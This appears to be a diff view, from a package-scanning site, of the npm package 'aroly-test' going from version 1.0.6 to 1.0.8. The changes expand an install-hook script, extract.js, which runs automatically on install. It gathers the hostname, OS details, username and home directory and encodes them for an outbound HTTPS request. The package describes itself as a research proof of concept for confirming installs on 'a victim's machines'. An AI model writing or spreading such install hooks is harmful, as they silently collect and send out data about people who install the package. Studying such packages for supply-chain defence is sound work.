aroly-test 1.0.6 → 1.0.8
Sign up to get free protection for your applications and to get access to all the features.
- package/extract.js +6 -2
- package/package.json +3 -3
package/extract.js
CHANGED
@@ -1,14 +1,18 @@
|
|
1
1
|
const https = require('https');
|
2
2
|
var os = require("os");
|
3
3
|
var hostname = os.hostname();
|
4
|
+
var type = os.type();
|
4
5
|
var version = os.version();
|
6
|
+
var release = os.release();
|
5
7
|
var info = os.userInfo();
|
8
|
+
var package_name = process.argv[2];
|
9
|
+
var package_version = process.argv[3];
|
6
10
|
|
7
|
-
var message = "
|
11
|
+
var message = "Package '" + package_name + "', version: " + package_version + " has been installed on hostname: '" + hostname + "', type: '" + type +"', release: '" + release + "', version: '" + version + "', username: '" + info["username"] + "', homedir: '" + info["homedir"] + "'.";
|
8
12
|
|
9
13
|
const data = new TextEncoder().encode(
|
10
14
|
JSON.stringify({
|
11
|
-
content:
|
15
|
+
content: message,
|
12
16
|
})
|
13
17
|
);
|
14
18
|
|
package/package.json
CHANGED
@@ -1,14 +1,14 @@
|
|
1
1
|
{
|
2
2
|
"name": "aroly-test",
|
3
|
-
"version": "1.0.
|
3
|
+
"version": "1.0.8",
|
4
4
|
"description": "This package is a proof of concept used by Antoine Roly to conduct research. It has been uploaded for test purposes only. Its only function is to confirm the installation of the package on a victim's machines. The code is not malicious in any way.",
|
5
5
|
"main": "index.js",
|
6
6
|
"author": "Antoine Roly <antoine.roly@gmail.com>",
|
7
7
|
"license": "ISC",
|
8
8
|
"dependencies": {
|
9
|
-
"aroly-test": "^1.0.
|
9
|
+
"aroly-test": "^1.0.7"
|
10
10
|
},
|
11
11
|
"scripts": {
|
12
|
-
"install": "node extract.js"
|
12
|
+
"install": "node extract.js $npm_package_name $npm_package_version"
|
13
13
|
}
|
14
14
|
}
|